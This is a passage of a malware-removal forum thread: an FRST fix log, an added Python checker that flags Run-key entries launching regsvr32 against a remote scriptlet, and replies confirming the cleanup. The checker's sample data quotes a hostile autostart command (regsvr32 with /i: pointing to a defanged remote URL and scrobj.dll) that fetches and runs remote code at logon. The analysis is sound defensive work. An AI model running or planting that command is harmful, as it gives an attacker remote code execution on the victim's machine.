CHR Extension: (Chrome Web Store Payments) - C:\Users\Ligaya\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-03-09] => Error: No automatic fix found for this entry.
CHR Extension: (Chrome Media Router) - C:\Users\Ligaya\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-08-09] => Error: No automatic fix found for this entry.
HKU\S-1-5-21-1090255531-1958037965-2896169239-1004_Classes\CLSID\{1423F872-3F7F-4E57-B621-8B1A9D49B448} => key removed successfully
HKU\S-1-5-21-1090255531-1958037965-2896169239-1004_Classes\CLSID\{590C4387-5EBD-4D46-8A84-CD0BA2EF2856} => key removed successfully
HKU\S-1-5-21-1090255531-1958037965-2896169239-1004_Classes\CLSID\{59B55F04-DE14-4BB8-92FF-C4A22EF2E5F4} => key removed successfully
HKU\S-1-5-21-1090255531-1958037965-2896169239-1004_Classes\CLSID\{5C8C2A98-6133-4EBA-BBCC-34D9EA01FC2E} => key removed successfully
HKU\S-1-5-21-1090255531-1958037965-2896169239-1004_Classes\CLSID\{78550997-5DEF-4A8A-BAF9-D5774E87AC98} => key removed successfully
HKU\S-1-5-21-1090255531-1958037965-2896169239-1004_Classes\CLSID\{793EE463-1304-471C-ADF1-68C2FFB01247} => key removed successfully
HKU\S-1-5-21-1090255531-1958037965-2896169239-1004_Classes\CLSID\{8C46158B-D978-483C-A312-16EE5013BE04} => key removed successfully
HKU\S-1-5-21-1090255531-1958037965-2896169239-1004_Classes\CLSID\{CB492AF1-2CEF-4E58-BE47-471C77D0C8BA} => key removed successfully
HKU\S-1-5-21-1090255531-1958037965-2896169239-1004_Classes\CLSID\{CC182BE1-84CE-4A57-B85C-FD4BBDF78CB2} => key removed successfully
HKU\S-1-5-21-1090255531-1958037965-2896169239-1004_Classes\CLSID\{D1EDC4F5-7F4D-4B12-906A-614ECF66DDAF} => key removed successfully
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ SkyDrive1 => key removed successfully
HKLM\Software\Classes\CLSID\{F241C880-6982-4CE5-8CF7-7085BA96DA5A} => key not found. 
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ SkyDrive2 => key removed successfully
HKLM\Software\Classes\CLSID\{A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => key not found. 
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ SkyDrive3 => key removed successfully
HKLM\Software\Classes\CLSID\{BBACC218-34EA-4666-9D7A-C78F2274A524} => key not found. 
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\00asw => key removed successfully
HKLM\Software\Classes\CLSID\{472083B0-C522-11CF-8763-00608CC02F24} => key not found. 
HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ SkyDrive1 => key removed successfully
HKLM\Software\Wow6432Node\Classes\CLSID\{F241C880-6982-4CE5-8CF7-7085BA96DA5A} => key not found. 
HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ SkyDrive2 => key removed successfully
HKLM\Software\Wow6432Node\Classes\CLSID\{A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => key not found. 
HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ SkyDrive3 => key removed successfully
HKLM\Software\Wow6432Node\Classes\CLSID\{BBACC218-34EA-4666-9D7A-C78F2274A524} => key not found. 
HKLM\Software\Classes\Directory\Background\ShellEx\ContextMenuHandlers\igfxcui => key removed successfully
HKLM\Software\Classes\CLSID\{3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => key not found. 
C:\WINDOWS\system32\Drivers\btmhsf.sys => ":Microsoft_Appcompat_ReinstallUpgrade" ADS removed successfully.
C:\Users\Gaya\Desktop\IMG_20140804_123230.jpg => ":com.dropbox.attributes" ADS removed successfully.
C:\Users\Ligaya\Desktop\TRAVEL.txt => ":com.dropbox.attributes" ADS removed successfully.
HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\UDP Query User{09E0091B-10DA-4E55-B2DD-33EA7B981580}C:\windows\kmsemulator.exe => value removed successfully
HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\TCP Query User{3A914466-2DAE-4ED6-B1C6-0540889488B6}C:\windows\kmsemulator.exe => value removed successfully
"C:\windows\kmsemulator.exe" => not found.
 
=========== EmptyTemp: ==========
 
BITS transfer queue => 8388608 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 21449757 B
Java, Flash, Steam htmlcache => 2393 B
Windows/system/drivers => 2158731551 B
Edge => 0 B
Chrome => 699088197 B
Firefox => 377690272 B
Opera => 0 B
 
Temp, IE cache, history, cookies, recent:
Default => 0 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 128 B
systemprofile32 => 128 B
LocalService => 947046 B
NetworkService => 10209314 B
UpdatusUser => 0 B
Gaya => 8540488 B
Ligaya => 2374687602 B
 
RecycleBin => 0 B
EmptyTemp: => 5.3 GB temporary data Removed.
 
================================
 
 
The system needed a reboot.
 
==== End of Fixlog 10:56:15 ====
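The entry in the fixlist most worth understanding is the Run value that FRST tagged with ATTENTION: its data is not a file on disk but a command line that makes regsvr32 fetch a scriptlet from a remote server and execute it at every logon, which fits the symptom described at the top of the thread (quarantining files did nothing, yet the detection came back after each boot and stopped once the value was removed). As an added example, not code from this thread, from FRST or from anyone posting here, the following Python checker reads FRST-style autostart lines and flags that pattern. The regular expression, function names and the benign sample lines are my own constructions; the COM+ line is copied verbatim from the fixlist above, with the URL left defanged as FRST prints it.

```python
"""Flag FRST autostart (Run key) entries that launch regsvr32 against a remote scriptlet.

Added example for this thread; not part of FRST and not code posted by anyone here.
"""
import re
from dataclasses import dataclass, field
from typing import List

# FRST prints autostart values as  <hive>\...\Run: [<value name>] => <command>
# and appends "<==== ATTENTION" to entries it considers suspicious.
RUN_LINE = re.compile(
    r"^(?P<hive>HK[A-Z]+[^:]*?)\\\.\.\.\\Run(?:Once)?: \[(?P<name>[^\]]*)\] => (?P<cmd>.*)$"
)
ATTENTION_TAG = "<==== ATTENTION"


@dataclass
class Finding:
    hive: str
    name: str
    command: str
    reasons: List[str] = field(default_factory=list)


def analyse_command(cmd: str) -> List[str]:
    """Return the reasons a command line looks like regsvr32 scriptlet execution."""
    reasons: List[str] = []
    lower = cmd.lower()
    if "regsvr32" not in lower:
        return reasons
    tokens = lower.split()
    # /i:<url> hands a remote scriptlet to DllInstall; FRST writes hxxp for http.
    if re.search(r"/i:\s*(?:hxxps?|https?)://", lower):
        reasons.append("/i: argument is a remote URL: the payload lives on a server, not on disk")
    # scrobj.dll is the COM scriptlet host; 'registering' it installs nothing, it runs the scriptlet.
    if "scrobj.dll" in tokens:
        reasons.append("target DLL is scrobj.dll: COM scriptlet execution, not a normal registration")
    # /n skips DllRegisterServer and /u means 'uninstall'; together they leave no registration behind.
    if "/n" in tokens and "/u" in tokens:
        reasons.append("/n /u combination: nothing is registered, only DllInstall runs")
    return reasons


def scan_frst_lines(lines: List[str]) -> List[Finding]:
    """Parse FRST-style lines and return the Run entries that match the pattern."""
    findings: List[Finding] = []
    for raw in lines:
        m = RUN_LINE.match(raw.strip())
        if not m:
            continue
        cmd = m.group("cmd").replace(ATTENTION_TAG, "").strip()
        reasons = analyse_command(cmd)
        if reasons:
            findings.append(Finding(m.group("hive"), m.group("name"), cmd, reasons))
    return findings


# Sample input (constructed for this example): the COM+ entry is copied from the
# fixlist in this thread; the other lines are made-up benign autostarts for contrast.
SAMPLE_LINES = [
    r"HKLM-x32\...\Run: [] => [X]",
    r"HKU\S-1-5-21-1090255531-1958037965-2896169239-1004\...\Run: [COM+] => regsvr32 /s /n /u /i:hxxp://server2.aserdefa.ru/restore.xml scrobj.dll <==== ATTENTION",
    r"HKLM\...\Run: [VendorTray] => C:\Program Files\Vendor\tray.exe /background",
    r"HKLM\...\Run: [LocalRegistration] => regsvr32 /s C:\Program Files\Vendor\shellext.dll",
]


if __name__ == "__main__":
    for f in scan_frst_lines(SAMPLE_LINES):
        print(f"{f.hive} Run value '{f.name}': {f.command}")
        for r in f.reasons:
            print("  -", r)
```

Run against the sample, only the COM+ entry is reported, with all three reasons; the regsvr32 call that registers a local DLL with a plain path is not flagged, which is the distinction a helper reading these logs needs to make. The same function can be pointed at a full FRST.txt, since it ignores every line that is not a Run entry.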


#4 nasdaq
  • Malware Response Team
  • 39,962 posts
  • Location:Montreal, QC. Canada

Posted 22 August 2017 - 08:00 AM

Has your problem been solved?

#5 Gaya19
  • Topic Starter
  • Members
  • 3 posts

Posted 22 August 2017 - 08:26 AM

Hi Nasdaq. Since my last message, I've tried booting my computer 2-3 times and Behavior:Win32/Powemet.B!attk has no longer been detected by Windows Defender, so I guess the problem has been solved. Thank you very much! I really appreciate it.



#6 nasdaq
  • Malware Response Team
  • 39,962 posts
  • Location:Montreal, QC. Canada

Posted 22 August 2017 - 12:44 PM

If all is well.

To learn more about how to protect yourself while on the internet, read this little guide on best security practices to keep safe.
http://www.bleepingcomputer.com/forums/t/407147/answers-to-common-security-questions-best-practices/


https://www.bleepingcomputer.com/tutorials/keep-your-computer-safe-online/
Simple and easy ways to keep your computer safe and secure on the Internet.
==



